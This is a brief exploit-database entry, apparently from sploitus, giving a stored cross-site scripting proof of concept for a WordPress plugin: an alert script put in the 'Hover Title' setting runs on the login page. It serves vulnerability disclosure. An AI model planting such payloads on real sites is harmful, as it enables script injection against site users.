## https://sploitus.com/exploit?id=WPEX-ID:AD895200-A03A-4E92-B256-D6991547D38A Put the following payload in the "Hover Title" settings of the plugin: <script>alert(/XSS/)</script> The XSS will be triggered on the login page